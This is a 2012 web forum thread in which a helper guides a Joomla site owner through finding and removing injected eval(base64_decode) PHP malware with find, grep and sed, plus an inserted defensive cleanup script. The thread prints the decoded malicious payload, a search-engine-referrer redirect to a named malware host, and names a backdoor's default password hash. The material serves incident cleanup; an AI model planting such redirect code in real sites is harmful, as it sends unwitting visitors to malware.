Find and replace command


Find and replace command

Postby livicrew on Thu Jan 05, 2012 9:41 am

Hi guys,

Recently I needed to clean up hacked code on my webserver. I used the following to find the base64 coding:

Code:
find . -type f -name "*.php" -exec grep -H "eval(base64_decode)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" {} \; > potentially_infected_files.txt

This gave me a list of infected files; I then manually deleted the scripting.

How could I use this command (or SED) to find the code in every file on the server and then replace it with a space?

Possibly a script I can run manually when I am suspicious of a compromise.
Any help would be much appreciated.

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 9:45 am

Code:
# Match is bounded to the injected statement (up to its own ?>) so legitimate code
# that follows on the same line is kept; the original pattern's .*?> is greedy in sed
find . -name "*.php" -type f -exec sed -i 's/<?php \/\*\*\/ eval(base64_decode("DQplcn[^"]*"));*?>//g' {} \;


should remove them/it.

YMMV. Make backups.
My DorkBlog
Cirrhus9.com - Managed HA VDSs and Scalable grid solutions.

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 9:48 am

BTW:

That reads
Code:
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
   if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://newyrfhrh.bij.pl/");
      exit();
   }
}
}


which comes from
Code:
echo "<long_string_after_eval(base64_decode(>" | base64 -d
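As an added example (not code from this thread or from Habitual), here is a small POSIX shell script that does what the two posts above describe end to end: it finds PHP files carrying the eval(base64_decode("...")) line, decodes the payload so you can read it before deleting anything, and strips the statement while keeping a .bak copy. It assumes GNU find/grep/sed and coreutils base64; the sample site it builds with make_sample is constructed for demonstration.

```shell
#!/bin/sh
# Added example, not code from the thread: locate the eval(base64_decode("...")) injection
# the posts describe, decode its payload for review, and strip it with a backup kept beside
# each file. Assumes GNU find/grep/sed and coreutils base64 (sed -i and base64 -d are the
# GNU forms); the sample site built by make_sample is constructed for demonstration.
set -u

# Bounded BRE: the whole encoded argument, not just the attacker's "DQplcn" prefix, so a
# re-encoded variant of the same injection is still caught. ( and ) are literal in BRE.
PATTERN='eval(base64_decode("[A-Za-z0-9+/=]*"))'

# Print file:line for every PHP file under $1 that carries the injection.
find_injected() {
    find "$1" -type f -name '*.php' -exec grep -nH "$PATTERN" {} \;
}

# Decode the first encoded argument found in file $1 so the operator can read what it does
# (in the thread it was a redirect keyed on the HTTP referrer) before deleting anything.
decode_payload() {
    grep -o 'base64_decode("[A-Za-z0-9+/=]*")' "$1" | head -n 1 \
        | sed 's/base64_decode("\(.*\)")/\1/' | base64 -d
}

# Remove the injected statement from $1 in place, keeping $1.bak for rollback.
# The match is anchored on <?php /**/ ... ?> so legitimate code on the same line survives.
# Returns 0 if the file changed, 1 if nothing matched. '|' is used as the s-delimiter
# because the base64 alphabet contains '/'.
strip_injection() {
    cp -p "$1" "$1.bak"
    sed -i 's|<?php */\*\*/ *eval(base64_decode("[A-Za-z0-9+/=]*"));*?>||g' "$1"
    ! cmp -s "$1" "$1.bak"
}

# Build a throwaway site: one file with a constructed injection ahead of real code, one clean.
# Prints the directory so the caller can inspect and remove it.
make_sample() {
    dir=$(mktemp -d)
    payload=$(printf '%s' 'header("Location: http://example.invalid/");' | base64 | tr -d '\n')
    printf '<?php /**/ eval(base64_decode("%s"));?><?php echo "Hello"; ?>\n' "$payload" \
        > "$dir/index.php"
    printf '<?php echo "clean"; ?>\n' > "$dir/clean.php"
    printf '%s\n' "$dir"
}
```

Review decode_payload's output for each hit before running strip_injection; the .bak files let you diff what was removed.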

Re: Find and replace command

Postby livicrew on Thu Jan 05, 2012 10:05 am

Thanks for that, I will make very good use of it.

How did you 'read' the file? Also, can I find the password he used in his script?

I read this, and the guy managed to read the password: blog.kejsarmakten.se/all/software/2011/01/14/malware-in-joomla.html This was the exact hack I had.

This would be useful, as I could delete every backdoor on my website using his script.

Thanks again

Peter

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 10:24 am

Peter:

So you are running Joomla?
You do realize that all PHP scripts are now suspect?
This is shared hosting or not?

I 'found' it with terminal >
Code:
echo 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 | base64 -d


Password...? It's a common redirect that says "you're going to visit http://newyrfhrh.bij.pl/" if you come from {list_of_referrers}.
"It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland."
This is a first step in many attacks but it is actually the Symptom of a hack. What does
Code:
find "$(pwd)" -name z.php -exec less {} \;
show us?
The password is usually hard-coded in a PHP file somewhere (in clear or obfuscated text).

Is http://blog.kejsarmakten.se/all/softwar ... oomla.html your article?

Tighten up Joomla if you run it, and never run Joomla if you don't.
More holes than a Microsoft Product IMO.
Only thing worse is telnet.

Joomla gallery components are a popular target.

I learned 80% of this by extensive reading at
http://blog.unmaskparasites.com/ and
http://25yearsofprogramming.com/blog/

Lemme know...

Subscribed with interest...

JJ

Re: Find and replace command

Postby livicrew on Thu Jan 05, 2012 10:29 am

Hi

It's not my article; I found it while working on the hack on my Joomla website. It appears the com_oziogallery had a backdoor, so I have removed ozio. I also use coppermine galleries, which also had/has a backdoor. I have the latest version, but I am still not sure how secure it is.

I am on shared hosting.

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 10:38 am

Peter:

livicrew wrote:... Also, can I find the password he used in his script?


Terminal >
Code:
# quote the pattern, otherwise the shell expands $auth_pass to an empty string before grep runs
find "$(pwd)" -type f -name "*.php" -exec grep -H '$auth_pass' {} \;


IF you get a "63a9f0ea7bb98050796b649e85481845" in the output/string, the password is "root" (no quotes)

livicrew wrote:...as I could delete every backdoor onto my website using his script.

Without better Joomla security, it will just come right back.

All Files except .cgi should be 644
All directories should be 755

Shared hosting. Ugh.

Should you decide that you need a more in-depth investigation and solution, send me a PM with your everyday email address and we can continue discussing your Security and/or remedy.

JJ

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 10:43 am

Peter:

livicrew wrote:...It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.


Got backup?

Re: Find and replace command

Postby livicrew on Thu Jan 05, 2012 10:57 am

Thanks for that. I will keep my eye on it and if I need help, I will give you a shout.

Maybe I should go back to a 'normal' website and drop Joomla!

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 11:26 am

Peter:

Check your PMs...
